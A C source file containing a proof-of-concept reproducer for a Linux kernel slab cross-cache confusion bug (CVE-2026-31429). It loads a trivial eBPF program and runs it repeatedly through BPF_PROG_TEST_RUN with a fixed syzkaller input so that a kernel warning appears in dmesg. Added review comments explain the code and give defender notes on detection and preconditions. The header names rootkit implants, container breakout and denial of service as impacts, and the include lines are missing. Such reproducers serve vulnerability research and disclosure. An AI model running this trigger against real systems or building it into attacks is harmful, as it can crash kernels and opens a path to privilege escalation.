/*
 * POC for CVE-2026-31429
 * Linux Kernel >= 6.3 < 6.12.82 Slab Cross-Cache Confusion Vulnerability
 * Discovered by Antonius w1sdom - bluedragonsec.com
 *
 * Build: gcc -O2 -o cve-2026-31429-poc-only cve-2026-31429-poc-only.c
 * Might require root privilege!
 *
 * Related security impacts (as listed by the author):
 *   - mitigation bypass
 *   - disabling LSM
 *   - kernel rootkit implants
 *   - container breakout
 *   - denial of service
 *
 * Review summary of what the code below actually does: it loads a
 * do-nothing 3-instruction eBPF program with BPF_PROG_LOAD and then drives
 * it through BPF_PROG_TEST_RUN with a fixed 284-byte input, repeat=4 and
 * the run-on-CPU flag, 51 times in total. The only system calls issued are
 * mmap(2), bpf(2) and close(2). It is a trigger-only reproducer: the
 * program itself is `r0 = 0; exit` and no result is read back from the
 * kernel; the user is told to look for a "warn_free" line in dmesg.
 *
 * Defender notes:
 *   - Observable: the banner names warn_free_bad_obj, i.e. a kernel WARN
 *     from the slab free path after BPF_PROG_TEST_RUN. Kernel-log
 *     monitoring for that warning is the detection hook this repro
 *     advertises.
 *   - Preconditions: bpf(2) must be reachable and the caller must be able to
 *     load a SCHED_CLS program and use BPF_PROG_TEST_RUN. On mainline
 *     kernels both are gated behind CAP_NET_ADMIN (or an equivalent admin
 *     capability), which matches the author's "might require root" caveat
 *     — confirm for the target kernel.
 *   - The version range in the title implies the fix ships in 6.12.82; the
 *     page gives no commit id, so verify against the distribution changelog.
 */
#define _GNU_SOURCE
/*
 * NOTE(review): the header names were lost when this listing was extracted
 * (the angle-bracket targets are missing). From the identifiers used below
 * the file needs stdint.h, string.h, stdio.h, unistd.h, errno.h and
 * sys/syscall.h; the seventh include cannot be recovered from the code.
 * Restore them before building.
 */
#include
#include
#include
#include
#include
#include
#include

/* x86_64 syscall number for bpf(2); only used when the libc headers do not
 * already define it. */
#ifndef __NR_bpf
#define __NR_bpf 321
#endif

/* BPF insns: ld_imm64(r0,0) + exit — 3 insns = 24 bytes.
 * ld_imm64 is a two-slot (16-byte) instruction, so the 24 bytes are
 * "r0 = 0" followed by "exit". The program does nothing; it exists only so
 * that BPF_PROG_TEST_RUN has a valid prog_fd to run. */
static uint8_t bpf_prog_bytes[] = {
    0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

/* Fixed 284-byte buffer handed to BPF_PROG_TEST_RUN as data_in. The name and
 * the banner printed by main() say it is the exact input from a syzkaller
 * reproducer; the contents are opaque here and nothing in this file depends
 * on any individual byte. */
static uint8_t syz_data[284] = {
    0x60,0xdc,0x24,0x19,0xdd,0x5e,0x95,0xd4,0x73,0x79,0xd5,0x04,0xef,0x23,0xc1,0x79,
    0x45,0x52,0xaa,0x7b,0x7d,0x1d,0x56,0xfa,0xba,0x28,0x2e,0x46,0xc9,0x45,0x81,0x3d,
    0x60,0x90,0xa3,0x11,0x47,0xc0,0x7f,0x95,0xf2,0x71,0x69,0xcb,0x54,0xbe,0x67,0x59,
    0x79,0x28,0x85,0xcb,0x60,0xfa,0x32,0x80,0x61,0xa0,0xc9,0x05,0xc3,0xaa,0x1e,0x4c,
    0x7b,0x82,0xf5,0x74,0x69,0x25,0x10,0x83,0xa0,0x12,0x8e,0x50,0xde,0xb0,0x10,0x72,
    0xd9,0xc4,0x7a,0x94,0xca,0x02,0xb3,0xf7,0x4a,0xf9,0xba,0xcf,0xb5,0xf7,0x06,0x13,
    0x36,0x1b,0x48,0x01,0xbe,0xd2,0x6b,0x41,0x30,0xf9,0x68,0x1e,0xd2,0xa7,0xc6,0x93,
    0xff,0x8e,0xd1,0xea,0xf8,0x20,0xc0,0x60,0x13,0x33,0xe5,0xed,0x3f,0xd2,0xdc,0x8a,
    0x5d,0xea,0xbe,0xeb,0x37,0xaf,0x12,0x0a,0x72,0xe5,0x00,0x8f,0xea,0xf8,0xae,0x0f,
    0x59,0x9d,0xc1,0x86,0xc5,0xd5,0x8c,0x54,0x4a,0x1e,0xc8,0x83,0xf4,0xbc,0x04,0x6e,
    0xd9,0x7a,0xf6,0x39,0x06,0xc0,0x12,0xab,0x0b,0xa6,0xa6,0x6e,0x06,0xcc,0x06,0x17,
    0x78,0xe5,0x95,0x13,0x1c,0x15,0xcd,0xdf,0x7c,0x57,0x75,0xe3,0xaa,0x3d,0x8a,0x14,
    0x13,0x97,0xed,0x95,0x93,0x90,0x27,0x81,0xf2,0xa1,0x64,0x32,0x5f,0x30,0x4c,0xba,
    0x56,0x6f,0xa5,0x7e,0xef,0xff,0xa7,0x9e,0xa5,0xbb,0x08,0x71,0xd9,0x9f,0x3e,0xbb,
    0x4c,0x46,0xed,0x51,0xc9,0x55,0x2b,0xda,0x25,0xa8,0x12,0x85,0xdc,0x0b,0x06,0x4a,
    0xa7,0xfc,0xfb,0x00,0xf7,0x8a,0x33,0x24,0x8e,0x4d,0xf8,0x87,0xf2,0xe6,0x09,0x5c,
    0x05,0xc9,0x97,0x20,0x96,0x66,0xf9,0xb5,0xad,0x2f,0xed,0x68,0x41,0xfa,0xb9,0x93,
    0x28,0x88,0x5b,0x45,0x5e,0x61,0x6f,0x62,0x94,0xaa,0x17,0x68,
};

/*
 * Load the 3-insn program above with BPF_PROG_LOAD (bpf cmd 5).
 *
 * union bpf_attr is built by hand in a 0x94-byte zeroed buffer:
 * prog_type at +0x00, insn_cnt at +0x04, insns at +0x08, license at +0x10.
 * Every other field stays zero (no log buffer, no expected attach type).
 *
 * Returns the program fd (>= 0) on success, or -1 with errno set.
 *
 * NOTE(review): the stores go through uint32_t and uint64_t pointer casts
 * into a uint8_t array. memcpy into the buffer, or a real union bpf_attr
 * from linux/bpf.h, would avoid the aliasing/alignment concern; the code is
 * left as the author wrote it.
 */
static int bpf_load(void)
{
    uint8_t attr[0x94];
    memset(attr, 0, sizeof(attr));
    *(uint32_t*)(attr+0x00) = 3;                        /* prog_type = SCHED_CLS */
    *(uint32_t*)(attr+0x04) = 3;                        /* insn_cnt */
    *(uint64_t*)(attr+0x08) = (uint64_t)bpf_prog_bytes; /* insns */
    *(uint64_t*)(attr+0x10) = (uint64_t)"GPL";          /* license */
    return (int)syscall(__NR_bpf, 5, attr, 0x94);
}

/*
 * Drive program @fd through BPF_PROG_TEST_RUN (bpf cmd 10).
 *
 * @fd      program fd returned by bpf_load()
 * @data    input buffer (data_in)
 * @sz      data_size_in
 * @repeat  number of times the kernel runs the program in one call
 * @flags   test-run flags; main() passes 4 (BPF_F_TEST_RUN_ON_CPU)
 *
 * The attr buffer is 0x50 bytes: prog_fd at +0x00, data_size_in at +0x08,
 * data_in at +0x10, repeat at +0x20, flags at +0x40, cpu at +0x44 (0, so
 * with the flag set the run is pinned to CPU 0). No data_out or ctx buffer
 * is supplied, so nothing is copied back to user space.
 *
 * Returns the raw syscall result; main() prints it once and otherwise
 * ignores it. errno is set on -1 as for any syscall.
 */
static long bpf_run(int fd, void *data, uint32_t sz, uint32_t repeat, uint32_t flags)
{
    uint8_t attr[0x50];
    memset(attr, 0, sizeof(attr));
    *(uint32_t*)(attr+0x00) = (uint32_t)fd;    /* prog_fd */
    *(uint32_t*)(attr+0x08) = sz;              /* data_size_in */
    *(uint64_t*)(attr+0x10) = (uint64_t)data;  /* data_in */
    *(uint32_t*)(attr+0x20) = repeat;          /* repeat */
    *(uint32_t*)(attr+0x40) = flags;           /* BPF_F_TEST_RUN_ON_CPU = 4 */
    *(uint32_t*)(attr+0x44) = 0;               /* cpu = 0 */
    return syscall(__NR_bpf, 10, attr, 0x50);
}

/*
 * Entry point: print the banner and identity, set up the syzkaller scratch
 * mapping, load the program, then issue 1 + 50 BPF_PROG_TEST_RUN calls with
 * the fixed input. Exits 1 if BPF_PROG_LOAD fails, 0 otherwise. No
 * kernel-side effect is verified from user space; the user is told to
 * inspect dmesg.
 */
int main(void)
{
    printf("repro2 — warn_free_bad_obj (syzkaller exact data)\n");
    /* Shows whether the run is privileged (see capability note at top). */
    printf("uid=%d euid=%d\n", getuid(), geteuid());

    /* mmap setup exactly as syzkaller does: a 16 MiB RWX region at
     * 0x200000000000 with a no-access guard page immediately below and
     * above it (flags 0x32 = MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE). Return
     * values are not checked. syz_data is a static array and is never
     * placed in this region, so the mapping looks like leftover reproducer
     * boilerplate — TODO confirm it is not needed for the trigger. */
    syscall(__NR_mmap, 0x1ffffffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
    syscall(__NR_mmap, 0x200000000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
    syscall(__NR_mmap, 0x200001000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);

    int fd = bpf_load();
    if (fd < 0) {
        /* errno is read right after the failing syscall, before any other
         * libc call could overwrite it. */
        printf("[-] BPF_PROG_LOAD: %s\n", strerror(errno));
        return 1;
    }
    printf("[+] prog fd=%d\n", fd);

    /* First run: data_size_in=284, repeat=4, flags=4 (run on CPU 0). */
    printf("[*] Trigger: syz_data=284B flags=4 repeat=4\n");
    long ret = bpf_run(fd, syz_data, 284, 4, 4);
    printf("[*] ret=%ld\n", ret);

    /* Loop for reliability: the same test run 50 more times; results are
     * ignored. */
    for (int i = 0; i < 50; i++)
        bpf_run(fd, syz_data, 284, 4, 4);

    printf("[+] Done — cek: dmesg | grep warn_free\n");
    close(fd);
    return 0;
}